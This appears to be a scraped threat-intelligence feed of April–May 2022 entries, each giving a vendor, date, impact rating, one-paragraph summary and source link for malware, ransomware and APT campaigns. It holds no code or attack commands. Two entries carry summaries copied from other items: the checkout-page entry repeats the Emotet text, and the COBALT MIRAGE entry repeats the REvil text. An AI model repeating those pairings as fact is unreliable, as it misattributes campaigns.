Emotet_The_journey
Date of Scan:
2022-05-19
Impact:
Medium
Summary:
Researchers from Palo Alto Networks documented the background of Emotet and its activity from November 2021 through January 2022.
Source: https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/
2022-05-19
Threat Actors targets US Business Online Checkout Page
Medium
+
Intel Source:
Palo Alto
Intel Name:
Threat Actors targets US Business Online Checkout Page
Date of Scan:
2022-05-19
Impact:
Medium
Summary:
Researchers from Palo Alto Networks documented the background of Emotet and its activity from November 2021 through January 2022.
Source: https://www.ic3.gov/Media/News/2022/220516.pdf
2022-05-18
Uncovering_Kingminer_Botnet_Attack
Low
+
Intel Source:
Trend Micro
Intel Name:
Uncovering_Kingminer_Botnet_Attack
Date of Scan:
2022-05-18
Impact:
Low
Summary:
Researchers from Trend Micro detail the TTPs of the Kingminer botnet. In 2020, threat actors deployed Kingminer to target SQL servers for cryptocurrency mining.
Source: https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html
2022-05-18
Wizard_Spider_Group_In_Depth_Analysis
Medium
+
Intel Source:
Prodaft
Intel Name:
Wizard_Spider_Group_In_Depth_Analysis
Date of Scan:
2022-05-18
Impact:
Medium
Summary:
Researchers from PRODAFT published the results of an investigation into Wizard Spider, believed to either be or be associated with the Grim Spider and Lunar Spider hacking groups.
Source: https://www.prodaft.com/resource/detail/ws-wizard-spider-group-depth-analysis
2022-05-18
X_Cart_Skimmer_with_DOM_based_Obfuscation
Low
+
Intel Source:
Sucuri
Intel Name:
X_Cart_Skimmer_with_DOM_based_Obfuscation
Date of Scan:
2022-05-18
Impact:
Low
Summary:
A security researcher from Sucuri worked on an infected X-Cart website and found two interesting credit card stealers there: one skimmer located server-side, the other client-side.
Source: https://blog.sucuri.net/2022/05/x-cart-skimmer-with-dom-based-obfuscation.html
2022-05-18
Chaos_Ransomware_stands_with_Russia
Medium
+
Intel Source:
Fortinet
Intel Name:
Chaos_Ransomware_stands_with_Russia
Date of Scan:
2022-05-18
Impact:
Medium
Summary:
FortiGuard Labs came across a variant of the Chaos ransomware that appears to side with Russia. This variant of the ransomware has been leveraging the Russia-Ukraine conflict.
Source: https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia
2022-05-18
RansomEXX_and_its_TTPs
Medium
+
Intel Source:
Trend Micro
Intel Name:
RansomEXX_and_its_TTPs
Date of Scan:
2022-05-18
Impact:
Medium
Summary:
Researchers from Trend Micro shed light on the tactics and techniques of the ransomware variant called RansomEXX, which has been active since 2020.
Source: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx
2022-05-18
Operation RestyLink targeting Japanese Firms
Medium
+
Intel Source:
NTT Security
Intel Name:
Operation RestyLink targeting Japanese Firms
Date of Scan:
2022-05-18
Impact:
Medium
Summary:
Researchers from NTT Security observed an APT campaign targeting Japanese companies starting from mid-April 2022. The initial attack vector in this campaign was spear-phishing email.
Source: https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies
2022-05-17
UpdateAgent_Returns_with_New_macOS_Malware_Dropper
Low
+
Intel Source:
Jamf
Intel Name:
UpdateAgent_Returns_with_New_macOS_Malware_Dropper
Date of Scan:
2022-05-17
Impact:
Low
Summary:
Researchers from Jamf Threat Labs came across a new variant of the macOS malware tracked as UpdateAgent. The malware relies on AWS infrastructure to host its various payloads and to report its infection status to the server.
Source: https://www.jamf.com/blog/updateagent-adapts-again/
2022-05-17
UN_social_program_themed_online_fraud
Medium
+
Intel Source:
CERT-UA
Intel Name:
UN_social_program_themed_online_fraud
Date of Scan:
2022-05-17
Impact:
Medium
Summary:
CERT-UA researchers recently responded to the discovery of a fraudulent Facebook page that mimics the website of the TV channel "TSN".
Source: https://cert.gov.ua/article/40240
2022-05-17
Onyx_Ransomware
Low
+
Intel Source:
Cyfirma
Intel Name:
Onyx_Ransomware
Date of Scan:
2022-05-17
Impact:
Low
Summary:
Researchers from Cyfirma analyzed samples of a new ransomware called Onyx which was first seen in April 2022. This ransomware encrypts files and then modifies their filenames by appending the .ampkcz extension.
Source: https://www.cyfirma.com/outofband/onyx-ransomware-report/
2022-05-17
Analysis_of_the_HUI_Loader
Low
+
Intel Source:
JPCERT
Intel Name:
Analysis_of_the_HUI_Loader
Date of Scan:
2022-05-17
Impact:
Low
Summary:
JPCERT researchers shared their analysis of HUI Loader, which has been used by multiple attack groups since around 2015, including APT10.
Source: https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html
2022-05-17
Custom_PowerShell_RAT_targets_Germans
Low
+
Intel Source:
MalwareBytes
Intel Name:
Custom_PowerShell_RAT_targets_Germans
Date of Scan:
2022-05-17
Impact:
Low
Summary:
Researchers from Malwarebytes came across a new campaign that plays on current concerns, luring Germans with the promise of updates on the threat situation in Ukraine and then infecting victims with a RAT.
Source: https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/
2022-05-17
Malicious_HTML_Help_File_Delivering_Agent_Tesla
Low
+
Intel Source:
Palo Alto
Intel Name:
Malicious_HTML_Help_File_Delivering_Agent_Tesla
Date of Scan:
2022-05-17
Impact:
Low
Summary:
Unit 42 researchers observed an attack utilizing malicious compiled HTML help files for the initial delivery. The method was used to deliver Agent Tesla.
Source: https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/
2022-05-16
KurayStealer_Malware
Low
+
Intel Source:
Uptycs
Intel Name:
KurayStealer_Malware
Date of Scan:
2022-05-16
Impact:
Low
Summary:
Researchers at Uptycs came across a new malware builder dubbed KurayStealer that has password-stealing and screenshot capabilities. The malware harvests passwords and screenshots and sends them to the attackers' Discord channel via webhooks.
Source: https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks
2022-05-16
Novel IceApple Post-Exploitation Framework
Low
+
Intel Source:
CrowdStrike
Intel Name:
Novel IceApple Post-Exploitation Framework
Date of Scan:
2022-05-16
Impact:
Low
Summary:
Researchers from CrowdStrike found a new post-exploitation threat being deployed on Microsoft Exchange servers. The threat has been dubbed IceApple.
Source: https://www.crowdstrike.com/wp-content/uploads/2022/05/crowdstrike-iceapple-a-novel-internet-information-services-post-exploitation-framework.pdf
2022-05-16
APT29_Abusing_Legitimate_Software_For_Targeted_Operations_In_Europe
Medium
+
Intel Source:
Cluster25
Intel Name:
APT29_Abusing_Legitimate_Software_For_Targeted_Operations_In_Europe
Date of Scan:
2022-05-16
Impact:
Medium
Summary:
Cluster25 researchers analyzed several spear-phishing campaigns linked to APT29 that involve the use of a side-loaded DLL through signed software (such as the Adobe suite) and legitimate web services (such as Dropbox) as the communication vector for Command and Control (C&C).
Source: https://cluster25.io/2022/05/13/cozy-smuggled-into-the-box/
2022-05-16
Telegram_used_to_spread_Eternity_Malware
Low
+
Intel Source:
Cyble
Intel Name:
Telegram_used_to_spread_Eternity_Malware
Date of Scan:
2022-05-16
Impact:
Low
Summary:
Researchers from Cyble came across a new malware service, dubbed the Eternity Project by the threat actors behind it, which allows cybercriminals to target potential victims with a customized threat offering based on individual modules.
Source: https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/
2022-05-16
Quantum_Locker_Ransomware
Medium
+
Intel Source:
Cybereason
Intel Name:
Quantum_Locker_Ransomware
Date of Scan:
2022-05-16
Impact:
Medium
Summary:
Researchers at Cybereason analyzed Quantum Locker ransomware and demonstrated its detection and prevention. The initial infection method used by the operators is the infamous malware IcedID.
Source: https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware
2022-05-16
From_0_Day_to_Mirai
High
+
Intel Source:
ISC.SANS
Intel Name:
From_0_Day_to_Mirai
Date of Scan:
2022-05-16
Impact:
High
Summary:
Researchers at ISC.SANS found attacks exploiting the recent high severity vulnerability in F5 products and were able to attribute the attacks to Mirai.
Source: https://isc.sans.edu/diary/rss/28644
2022-05-13
UAC_0010_Armageddon_leveraging_GammaLoad_PS1_v2_malware
Medium
+
Intel Source:
CERT-UA
Intel Name:
UAC_0010_Armageddon_leveraging_GammaLoad_PS1_v2_malware
Date of Scan:
2022-05-13
Impact:
Medium
Summary:
CERT-UA has analysed a phishing campaign with the subject "On revenge in Kherson!" containing an attachment in the form of a file "Plan Kherson.htm". The campaign uses the malicious program GammaLoad.PS1_v2 and is attributed to a group called UAC-0010 (Armageddon).
Source: https://cert.gov.ua/article/40240
2022-05-13
Phishing_campaign_delivering_AveMariaRAT_BitRAT_PandoraHVNC
Low
+
Intel Source:
Fortinet
Intel Name:
Phishing_campaign_delivering_AveMariaRAT_BitRAT_PandoraHVNC
Date of Scan:
2022-05-13
Impact:
Low
Summary:
Researchers at Fortinet's FortiGuard Labs have analysed a phishing campaign that was delivering three fileless malware families onto a victim's device. Once executed, the malware is able to steal sensitive information from that device. It mainly affects Microsoft Windows users.
Source: https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware
2022-05-13
Iranian_threat_actor_COBALT_MIRAGE_conducting_Ransomware_operations_in_US
Medium
+
Intel Source:
SecureWorks
Intel Name:
Iranian_threat_actor_COBALT_MIRAGE_conducting_Ransomware_operations_in_US
Date of Scan:
2022-05-13
Impact:
Medium
Summary:
SecureWorks Counter Threat Unit has analysed REvil ransomware samples that indicate GOLD SOUTHFIELD has resumed operations. The identification of multiple samples containing different modifications, and the lack of an official new version, indicate that REvil is under active development.
Source: https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us
2022-05-13
APT34_targets_Jordan_Government_using_new_Saitama_backdoor
Medium
+
Intel Source:
MalwareBytes
Intel Name:
APT34_targets_Jordan_Government_using_new_Saitama_backdoor
Date of Scan:
2022-05-13
Impact:
Medium
Summary:
Researchers at Malwarebytes identified a suspicious email on April 26 targeting a government official at Jordan's foreign ministry. It contained a malicious Excel document that delivered Saitama, a new tool that provides a backdoor into systems. Malwarebytes attributed the email to a threat group commonly known as APT34.
Source: https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/
2022-05-13
RedLine_Stealer_Campaign_spread_via_Github_hosted_payload
Medium
+
Intel Source:
NetSkope
Intel Name:
RedLine_Stealer_Campaign_spread_via_Github_hosted_payload
Date of Scan:
2022-05-13
Impact:
Medium
Summary:
Researchers at Netskope Threat Labs have discovered a new RedLine Stealer campaign spread on YouTube, using a fake bot to buy Mystery Box NFTs from Binance. The video description leads the victim to download the fake bot, which is hosted on GitHub.
Source: https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload
2022-05-12
Nerbian_RAT_targeting_firms_in_Italy_Spain_and_UK
Low
+
Intel Source:
Proofpoint
Intel Name:
Nerbian_RAT_targeting_firms_in_Italy_Spain_and_UK
Date of Scan:
2022-05-12
Impact:
Low
Summary:
Proofpoint researchers found a previously undocumented remote access trojan (RAT), called Nerbian RAT and written in the Go programming language, that has been spotted disproportionately targeting entities in Italy, Spain, and the U.K.
Source: https://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques
2022-05-12
TA578_distributing_Bumblebee_malware
Medium
+
Intel Source:
ISC.SANS
Intel Name:
TA578_distributing_Bumblebee_malware
Date of Scan:
2022-05-12
Impact:
Medium
Summary:
Researchers at ISC.SANS have analysed a campaign in which threat actor TA578 leverages thread-hijacked emails to push ISO files for Bumblebee malware. These thread-hijacked emails either have links to storage.googleapis.com URLs similar to those used in the Contact Forms campaign.
Source: https://isc.sans.edu/diary/rss/28636
2022-05-12
Malicious_NPM_Packages_targets_German_Companies
Low
+
Intel Source:
JFrog
Intel Name:
Malicious_NPM_Packages_targets_German_Companies
Date of Scan:
2022-05-12
Impact:
Low
Summary:
Researchers from JFrog have discovered a number of malicious packages in the NPM registry specifically targeting a number of prominent companies based in Germany to carry out supply chain attacks.
Source: https://jfrog.com/blog/npm-supply-chain-attack-targets-german-based-companies/
2022-05-12
Critical_F5_BIG_IP_Vulnerability_New_IoCs
High
+
Intel Source:
Palo Alto
Intel Name:
Critical_F5_BIG_IP_Vulnerability_New_IoCs
Date of Scan:
2022-05-12
Impact:
High
Summary:
Researchers from Palo Alto have also released a few indicators of compromise and their view on the critical F5 BIG-IP vulnerability.
Source: https://unit42.paloaltonetworks.com/cve-2022-1388/
2022-05-12
Bitter APT expands its target list
Medium
+
Intel Source:
Cisco Talos
Intel Name:
Bitter APT expands its target list
Date of Scan:
2022-05-12
Impact:
Medium
Summary:
An espionage-focused threat actor (Bitter APT) known for targeting China, Pakistan, and Saudi Arabia has added Bangladeshi government organizations to the targets of an ongoing campaign.
Source: https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html
2022-05-11
German_Automakers_targeted_by_InfoStealer_campaign
Low
+
Intel Source:
Checkpoint
Intel Name:
German_Automakers_targeted_by_InfoStealer_campaign
Date of Scan:
2022-05-11
Impact:
Low
Summary:
Check Point researchers discovered a years-long phishing campaign that has targeted German companies in the automotive industry, attempting to infect their systems with password-stealing malware.
Source: https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/
2022-05-11
New_Wave_of_Ursnif_Malware
High
+
Intel Source:
Qualys
Intel Name:
New_Wave_of_Ursnif_Malware
Date of Scan:
2022-05-11
Impact:
High
Summary:
Researchers at Qualys have discovered and analysed several phishing emails in which a macro-embedded XLS attachment, or a ZIP attachment containing an HTA file, initiated the infection chain. Researchers attributed this targeted attack to Ursnif, one of the most widespread banking trojans.
Source: https://blog.qualys.com/vulnerabilities-threat-research/2022/05/08/ursnif-malware-banks-on-news-events-for-phishing-attacks
2022-05-11
REvil_returns_reemergening_GOLD_SOUTHFIELD
High
+
Intel Source:
SecureWorks
Intel Name:
REvil_returns_reemergening_GOLD_SOUTHFIELD
Date of Scan:
2022-05-11
Impact:
High
Summary:
SecureWorks Counter Threat Unit has analysed REvil ransomware samples that indicate GOLD SOUTHFIELD has resumed operations. The identification of multiple samples containing different modifications, and the lack of an official new version, indicate that REvil is under active development.
Source: https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence
2022-05-11
Different_elements_of_Cobalt_Strike
Medium
+
Intel Source:
Palo Alto
Intel Name:
Different_elements_of_Cobalt_Strike
Date of Scan:
2022-05-11
Impact:
Medium
Summary:
Palo Alto Unit 42 researchers have analysed the Cobalt Strike tool, walked through its encoding algorithm, described the definitions of and differences between the encoding types used in the Cobalt Strike framework, and covered some malicious attacks seen in the wild.
Source: https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding/#Indicators-of-Compromise
2022-05-11
Examining_BlackBasta_ransomware
Medium
+
Intel Source:
Trend Micro
Intel Name:
Examining_BlackBasta_ransomware
Date of Scan:
2022-05-11
Impact:
Medium
Summary:
TrendMicro researchers have examined the whole infection routine of Black Basta ransomware and its infection tactics.
Source: https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html
2022-04-19
Recent Emotet Maldoc Outbreak
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Recent Emotet Maldoc Outbreak
Date of Scan:
2022-04-19
Impact:
MEDIUM
Summary:
Researchers at Fortinet have identified a recent Emotet outbreak being spread through a variety of malicious Microsoft Office files (maldocs) attached to phishing emails. Once a victim opens the attached document, a VBA macro or Excel 4.0 macro is used to execute malicious code that downloads and runs the Emotet malware.
Source: https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak
2022-04-19
Lazarus Group Targets Chemical Sector
MEDIUM
+
Intel Source:
Symantec
Intel Name:
Lazarus Group Targets Chemical Sector
Date of Scan:
2022-04-19
Impact:
MEDIUM
Summary:
Researchers from Symantec have observed the Lazarus group conducting an espionage campaign targeting organizations operating within the chemical sector. This campaign has been dubbed Operation Dream Job.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical
2022-04-19
Coordinated disruption of Zloader operation
LOW
+
Intel Source:
Microsoft/ESET
Intel Name:
Coordinated disruption of Zloader operation
Date of Scan:
2022-04-19
Impact:
LOW
Summary:
Microsoft's DCU has taken technical action against Zloader and disrupted its operations. ZLoader is run by a global internet-based organized crime gang operating malware as a service designed to steal and extort money.
Source: https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/ https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/
2022-04-19
SunnyDay Ransomware
LOW
+
Intel Source:
Seguranca-Informatica
Intel Name:
SunnyDay Ransomware
Date of Scan:
2022-04-19
Impact:
LOW
Summary:
Segurança-Informatica published an analysis of a recent sample of SunnyDay ransomware. As a result of the work, some similarities with other ransomware samples such as Ever101, Medusa Locker, Curator and Payment45 were found. According to the analysis, "SunnyDay is a simple piece of ransomware based on the SALSA20 stream cipher". SALSA20 is easy to recognize as it uses well-known values for its internal cryptographic operations.
Source: https://seguranca-informatica.pt/analysis-of-the-sunnyday-ransomware/#.Yl0eXdtBxPY
2022-04-18
New File extensions added to BlackCat ransomware's arsenal
MEDIUM
+
Intel Source:
SecureList
Intel Name:
New File extensions added to BlackCat ransomware's arsenal
Date of Scan:
2022-04-18
Impact:
MEDIUM
Summary:
Researchers at SecureList have analysed the BlackCat ransomware group's activities since its inception. They also compare BlackCat's TTPs with those of the BlackMatter group, such as a custom exfiltration tool called 'Fendr' that had previously been used exclusively in BlackMatter ransomware activity.
Source: https://securelist.com/a-bad-luck-blackcat/106254/
2022-04-18
Emotet Modules and Recent Attacks
MEDIUM
+
Intel Source:
SecureList
Intel Name:
Emotet Modules and Recent Attacks
Date of Scan:
2022-04-18
Impact:
MEDIUM
Summary:
Researchers from Kaspersky were able to retrieve 10 of the 16 modules used by Emotet for credential/password/account/e-mail stealing and spamming. Statistics on recent Emotet attacks were also shared.
Source: https://securelist.com/emotet-modules-and-recent-attacks/106290/
2022-04-18
BumbleBee Malware campaign
LOW
+
Intel Source:
Cynet
Intel Name:
BumbleBee Malware campaign
Date of Scan:
2022-04-18
Impact:
LOW
Summary:
Researchers from Cynet Security found a new campaign which, instead of malicious Office documents, uses malicious ISO image files to lure victims into executing the BumbleBee malware.
Source: https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/
2022-04-18
CVE_2022_22954_Seeder_Queries_14042022
MEDIUM
+
Intel Source:
STR
Intel Name:
CVE_2022_22954_Seeder_Queries_14042022
Date of Scan:
2022-04-18
Impact:
MEDIUM
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-04-18
New Fodcha DDoS botnet
MEDIUM
+
Intel Source:
netlab360
Intel Name:
New Fodcha DDoS botnet
Date of Scan:
2022-04-18
Impact:
MEDIUM
Summary:
Researchers at Qihoo 360's Network Security Research Lab have discovered a new DDoS botnet called 'Fodcha'. The botnet spread to over 62,000 devices between March 29 and April 10. The number of unique IP addresses linked to the botnet that researchers are tracking is around 10,000 per day, a Fodcha army of bots using Chinese IP addresses.
Source: https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/
2022-04-18
Indepth analysis of PYSA Ransomware Group
MEDIUM
+
Intel Source:
Prodaft
Intel Name:
Indepth analysis of PYSA Ransomware Group
Date of Scan:
2022-04-18
Impact:
MEDIUM
Summary:
Researchers at PRODAFT have identified and gained visibility into PYSA's ransomware infrastructure and analyzed their findings to gain insight into how the criminal operation works.
Source: https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis
2022-04-18
CVE_2022_24527_Seeder_Queries_14042022
MEDIUM
+
Intel Source:
STR
Intel Name:
CVE_2022_24527_Seeder_Queries_14042022
Date of Scan:
2022-04-18
Impact:
MEDIUM
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-04-18
XSS Vulnerability in Zimbra leveraged to target Ukraine Government
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
XSS Vulnerability in Zimbra leveraged to target Ukraine Government
Date of Scan:
2022-04-18
Impact:
MEDIUM
Summary:
CERT-UA has detected threat actors targeting Ukrainian government agencies with new attacks exploiting a Zimbra XSS vulnerability (CVE-2018-6882). CERT-UA has attributed this campaign to UAC-0097, a currently unknown actor.
Source: https://cert.gov.ua/article/39606 https://docs.google.com/spreadsheets/d/1Y987F976R9j4ztw2IyDzazzfpGL2bL00kCYFAeeo2tE/edit#gid=0
2022-04-14
ZingoStealer by Haskers Group
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
ZingoStealer by Haskers Group
Date of Scan:
2022-04-14
Impact:
MEDIUM
Summary:
Researchers at Cisco Talos have identified a new information stealer called 'ZingoStealer' that has been released for free by a threat actor known as 'Haskers Gang'. This information stealer, first introduced to the wild in March 2022, is currently undergoing active development, and multiple releases of new versions have been observed recently.
Source: https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/760/original/zingostealer-blog-iocs.txt?1649940925
2022-04-14
OldGremlin Gang resumes attack with new methods
MEDIUM
+
Intel Source:
Group-IB
Intel Name:
OldGremlin Gang resumes attack with new methods
Date of Scan:
2022-04-14
Impact:
MEDIUM
Summary:
Group-IB has uncovered new attack tools and methods used by the OldGremlin ransomware group. The group was first identified by Group-IB researchers in spring 2020; over the past two years OldGremlin has conducted 13 malicious email campaigns. Researchers also discovered two variants of the TinyFluff malware: an earlier one that is more complex, and a newer simplified version that copies the script and the Node.js interpreter from its storage location.
Source: https://blog.group-ib.com/oldgremlin_comeback
2022-04-14
Malware Campaigns Targeting African Banking Sector
MEDIUM
+
Intel Source:
HP Wolf Security
Intel Name:
Malware Campaigns Targeting African Banking Sector
Date of Scan:
2022-04-14
Impact:
MEDIUM
Summary:
Researchers from HP Wolf Security have been tracking a cybercrime campaign targeting the African banking sector since early 2022; it leverages phishing emails and HTML smuggling techniques to deploy malware. In one case, an employee of an unnamed West African bank received an email purporting to be from a recruiter at another African bank with information about job opportunities.
Source: https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/
2022-04-14
Critical Remote Code Execution Vulnerability in Windows RPC Runtime
HIGH
+
Intel Source:
Microsoft
Intel Name:
Critical Remote Code Execution Vulnerability in Windows RPC Runtime
Date of Scan:
2022-04-14
Impact:
HIGH
Summary:
Microsoft's April 2022 Patch Tuesday introduced patches for more than a hundred new vulnerabilities in various components. Three critical vulnerabilities were found and patched in the Windows RPC (Remote Procedure Call) runtime: CVE-2022-24492, CVE-2022-24528 and CVE-2022-26809. By exploiting these vulnerabilities, a remote unauthenticated attacker can execute code on the vulnerable machine with the privileges of the RPC service, which depends on the process hosting the RPC runtime.
Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809 https://www.securonix.com/blog/cve-2022-26809-remote-procedure-call-runtime-remote-code-execution-vulnerability-and-coverage/
2022-04-14
Enemybot leveraged by Keksec group
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Enemybot leveraged by Keksec group
Date of Scan:
2022-04-14
Impact:
MEDIUM
Summary:
Researchers at FortiGuard Labs have identified a new DDoS botnet called “Enemybot” and attributed it to a threat group called 'Keksec' that specializes in cryptomining and DDoS attacks. This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.
Source: https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet
2022-04-14
IcedID malware targeting Ukraine state bodies
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
IcedID malware targeting Ukraine state bodies
Date of Scan:
2022-04-14
Impact:
MEDIUM
Summary:
CERT-UA has issued a new heads-up warning of an ongoing cyber-attack that leverages the infamous IcedID malware to compromise Ukrainian state bodies. The detected malware, also known as BankBot or BokBot, is a banking Trojan primarily designed to target financial data and steal banking credentials.
Source: https://cert.gov.ua/article/39609 https://docs.google.com/spreadsheets/d/1QTwDDOO8JBpZbNyOnNvMm7VcZDQS0Y3CjYsMLrTKN7c/edit#gid=0
2022-04-14
Virus/XLS Xanpei Infecting Excel Files
MEDIUM
Intel Source:
ASEC
Intel Name:
Virus/XLS Xanpei Infecting Excel Files
Date of Scan:
2022-04-14
Impact:
MEDIUM
Summary:
The ASEC research team has identified the continued distribution of malware strains that spread the infection when an Excel file is opened. Upon opening the infected Excel file, a file containing the viral VBA code is dropped to the Excel startup path. Whenever any Excel file is subsequently opened, the malicious file in the Excel startup path is automatically executed to infect other files and perform additional malicious behaviors.
Source: https://asec.ahnlab.com/en/33630/
2022-04-12
Bahamut group recent attacks
MEDIUM
Intel Source:
360 Beacon Lab
Intel Name:
Bahamut group recent attacks
Date of Scan:
2022-04-12
Impact:
MEDIUM
Summary:
Researchers at 360 Beacon Lab have identified suspected mobile-device attack activity by the Bahamut group. Bahamut is an advanced threat group targeting the Middle East and South Asia. The group mainly uses phishing websites, fake news websites and social networking sites in its attacks.
Source: https://mp.weixin.qq.com/s/YAAybJBAvxqrQWYDg31BBw?_x_tr_sl=zh-CN&_x_tr_tl=en&_x_tr_hl=zh-CN
2022-04-12
New version of SolarMarker Malware
MEDIUM
Intel Source:
Palo Alto
Intel Name:
New version of SolarMarker Malware
Date of Scan:
2022-04-12
Impact:
MEDIUM
Summary:
A new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, has been identified by Palo Alto Networks and is believed to be active as of April 2022. This malware has been prevalent since September 2020, targeting U.S. organizations; part of the original infrastructure is still active as of 2022, in addition to new infrastructure that the attackers have recently deployed.
Source: https://unit42.paloaltonetworks.com/solarmarker-malware/
2022-04-12
Tarrask - HAFNIUM APT defense evasion malware
MEDIUM
Intel Source:
Microsoft
Intel Name:
Tarrask - HAFNIUM APT defense evasion malware
Date of Scan:
2022-04-12
Impact:
MEDIUM
Summary:
Microsoft Threat Intelligence Center has tracked the Chinese-backed Hafnium hacking group and linked it to a new piece of malware used to maintain persistence on compromised Windows environments. MSTIC has dubbed the defense evasion malware 'Tarrask' and characterized it as a tool that creates 'hidden' scheduled tasks on the system.
Source: https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/
2022-04-12
MoqHao Malware targeting European countries
LOW
Intel Source:
TeamCymru
Intel Name:
MoqHao Malware targeting European countries
Date of Scan:
2022-04-12
Impact:
LOW
Summary:
Researchers at Team Cymru have examined the current target base of the Roaming Mantis group, which is leveraging MoqHao malware to target European countries. MoqHao is generally used to target Android users, often via an initial attack vector of smishing.
Source: https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/
2022-04-12
Fake COVID-19 forms targeting companies
MEDIUM
Intel Source:
Cofense
Intel Name:
Fake COVID-19 forms targeting companies
Date of Scan:
2022-04-12
Impact:
MEDIUM
Summary:
The Cofense Phishing Defense Center has analysed a phishing campaign in which threat actors impersonate companies to send out fake COVID-19 forms. The CPDC team saw a phishing email masquerading as a general office-wide email claiming that someone in the building had been infected with COVID-19 and asking recipients to review the company policy.
Source: https://cofense.com/blog/covid-19-phish-targeting-companies
2022-04-12
SystemBC Malware
MEDIUM
Intel Source:
ASEC
Intel Name:
SystemBC Malware
Date of Scan:
2022-04-12
Impact:
MEDIUM
Summary:
The ASEC research team has identified a proxy malware called SystemBC that has been used by various attackers over the last few years. While it has recently been distributed through SmokeLoader or Emotet, this malware has steadily been used in various ransomware attacks in the past.
Source: https://asec.ahnlab.com/en/33600/
2022-04-12
EvilNominatus Ransomware
LOW
Intel Source:
ClearSky
Intel Name:
EvilNominatus Ransomware
Date of Scan:
2022-04-12
Impact:
LOW
Summary:
Researchers at ClearSky have detected a malicious BAT file that was uploaded to VirusTotal from Iran. This file executes ransomware associated with the EvilNominatus family, initially exposed at the end of 2021. Researchers believe that the ransomware’s developer is a young Iranian who bragged about its development on Twitter.
Source: https://www.clearskysec.com/wp-content/uploads/2022/04/EvilNominatus_Ransomware_7.4.22.pdf
2022-04-12
NetSupport RAT_Seeder_Queries_08/04/2022
MEDIUM
Intel Source:
STR
Intel Name:
NetSupport RAT_Seeder_Queries_08/04/2022
Date of Scan:
2022-04-12
Impact:
MEDIUM
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-04-12
Sandworm Group (UAC-0082) targeting Ukraine energy facilities using INDUSTROYER2 and CADDYWIPER
MEDIUM
Intel Source:
CERT-UA
Intel Name:
Sandworm Group (UAC-0082) targeting Ukraine energy facilities using INDUSTROYER2 and CADDYWIPER
Date of Scan:
2022-04-12
Impact:
MEDIUM
Summary:
CERT-UA has taken urgent measures to respond to an information security incident related to a targeted attack on a Ukrainian energy facility.
Source: https://cert.gov.ua/article/39518 https://docs.google.com/spreadsheets/d/1T2NyaCKfjszODa0hRu4xZFpnPe8yWP607aNHb7iB_ec/edit#gid=0
2022-04-11
Multiple cyber espionage operations disrupted
MEDIUM
Intel Source:
Facebook
Intel Name:
Multiple cyber espionage operations disrupted
Date of Scan:
2022-04-11
Impact:
MEDIUM
Summary:
Meta has shared its Adversarial Threat Report, which provides a broader view of the cyber threats Facebook observes in Iran, Azerbaijan, Ukraine, Russia, South America and the Philippines.
Source: https://about.fb.com/wp-content/uploads/2022/04/Meta-Quarterly-Adversarial-Threat-Report_Q1-2022.pdf
2022-04-11
DPRK-Nexus threat actor spear-phishing campaign
LOW
Intel Source:
Cluster25
Intel Name:
DPRK-Nexus threat actor spear-phishing campaign
Date of Scan:
2022-04-11
Impact:
LOW
Summary:
Researchers at Cluster25 have identified recent activity, starting in the early days of April 2022, by a DPRK-nexus threat actor using spear-phishing emails containing Korean-based malicious documents with different lures to compromise its victims.
Source: https://cluster25.io/2022/04/11/dprk-nexus-adversary-new-kitty-phishing/
2022-04-11
Mirai Botnet exploiting Spring4Shell Vulnerability
